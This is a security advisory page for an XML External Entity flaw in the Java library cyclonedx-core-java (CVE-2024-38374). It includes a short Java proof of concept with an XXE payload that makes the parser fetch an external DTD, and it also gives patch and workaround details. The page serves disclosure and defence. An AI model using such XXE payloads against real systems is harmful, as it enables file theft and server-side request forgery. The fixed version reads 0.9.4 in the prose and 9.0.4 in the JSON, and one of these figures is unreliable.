GHSA-683X-4444-JXH8

Vulnerability from github – Published: 2024-06-24 20:44 – Updated: 2024-06-28 18:58
VLAI?
Summary
Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java
Details

Impact

Before deserializing CycloneDX Bill of Materials in XML format, cyclonedx-core-java leverages XPath expressions to determine the schema version of the BOM. The DocumentBuilderFactory used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.

XXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.

PoC

import org.cyclonedx.parsers.XmlParser;

class Poc {

    public static void main(String[] args) {
        // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused
        new XmlParser().parse("""
            <?xml version="1.0" encoding="UTF-8"?>
            <!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>
            <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
            """.getBytes());
    }

}

Patches

The vulnerability has been fixed in cyclonedx-core-java version 0.9.4.

Workarounds

If feasible, applications can reject XML documents before handing them to cyclonedx-core-java for parsing. This may be an option if incoming CycloneDX BOMs are known to be in JSON format.

References

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.cyclonedx:cyclonedx-core-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "9.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38374"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-24T20:44:48Z",
    "nvd_published_at": "2024-06-28T18:15:04Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nBefore deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.\n\nXXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.\n\n### PoC\n\n```java\nimport org.cyclonedx.parsers.XmlParser;\n\nclass Poc {\n\n    public static void main(String[] args) {\n        // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused\n        new XmlParser().parse(\"\"\"\n            \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n            \u003c!DOCTYPE bom [\u003c!ENTITY % sp SYSTEM \"https://localhost:1010/does-not-exist/file.dtd\"\u003e %sp;]\u003e\n            \u003cbom xmlns=\"http://cyclonedx.org/schema/bom/1.5\"/\u003e\n            \"\"\".getBytes());\n    }\n\n}\n```\n\n### Patches\n\nThe vulnerability has been fixed in _cyclonedx-core-java_ version 0.9.4.\n\n### Workarounds\n\nIf feasible, applications can reject XML documents before handing them to _cyclonedx-core-java_ for parsing.\nThis may be an option if incoming CycloneDX BOMs are known to be in JSON format.\n\n### References\n\n* Issue was fixed via \u003chttps://github.com/CycloneDX/cyclonedx-core-java/pull/434\u003e\n* Issue was introduced via \u003chttps://github.com/CycloneDX/cyclonedx-core-java/commit/162aa594f347b3f612fe0a45071693c3cd398ce9\u003e\n* \u003chttps://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\u003e\n* \u003chttps://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression\u003e\n",
  "id": "GHSA-683x-4444-jxh8",
  "modified": "2024-06-28T18:58:48Z",
  "published": "2024-06-24T20:44:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38374"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/pull/434"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.